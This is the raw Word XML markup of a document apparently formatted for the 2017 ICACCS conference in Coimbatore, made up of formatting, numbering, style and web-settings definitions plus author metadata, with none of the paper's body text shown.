    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-317"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27D21" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
    <w:pPr>
      <w:spacing w:after="30" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-317" w:right="-226" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>2017 International Conference on Advanced Computing and Communication Systems (</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:i/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>ICACCS</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve"> -2017), Jan. 06 – 07, 2017, Coimbatore, INDIA </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6D67398C" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-317"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C8B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1CA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101D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B64C1EA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0E615EE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C56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35EBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3626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90A99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DC2C486"/>
    <w:lvl w:ilvl="0" w:tplc="FB4E75B6">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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2C8B7A68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92C6428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2F41F40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEF82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3132E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CFA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F084B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A230BCE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679212FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0388FC3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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A45309D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E50468A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D8C3823"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E2E5F2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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7E653FB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5838DD2E"/>
    <w:lvl w:ilvl="0" w:tplc="C3CC2232">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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1" w:tplc="2834C1E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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2" w:tplc="364EADF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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3" w:tplc="514A014E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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4" w:tplc="898A1686">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="694276F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="6F86CC64">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="CB76FB32">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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8" w:tplc="5BD43364">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="612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E7F2190"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3C07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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8"/>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2DD"/>
    <w:rsid w:val="00014C47"/>
    <w:rsid w:val="00054B99"/>
    <w:rsid w:val="00217D3F"/>
    <w:rsid w:val="00254673"/>
    <w:rsid w:val="002B7628"/>
    <w:rsid w:val="003775F4"/>
    <w:rsid w:val="006010D0"/>
    <w:rsid w:val="00606D22"/>
    <w:rsid w:val="00753988"/>
    <w:rsid w:val="008D5EED"/>
    <w:rsid w:val="00985DDC"/>
    <w:rsid w:val="009D67AD"/>
    <w:rsid w:val="00AF22DD"/>
    <w:rsid w:val="00C83A1A"/>
    <w:rsid w:val="00D2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BD7C"/>
  <w15:docId w15:val="{8CB72548-4D30-48BA-BECC-D2F22FB0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right="49" w:firstLine="35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74"/>
      <w:ind w:left="10" w:right="52" w:hanging="10"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00054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75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0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0D0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00054B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4B99"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003775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02">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="55518359">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="145510877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210580127">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="398021877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="478352668">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="510799077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="585237069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="644897877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="713776415">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="749813248">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="920288789">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="967053083">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1023944057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1070227774">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1169365061">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1209343022">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1224682330">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1317881787">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1429037676">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655984181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1694723341">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1776053940">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1786657255">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1983732431">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210017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sharon jose</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>cph0r</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-04T22:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-07T19:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>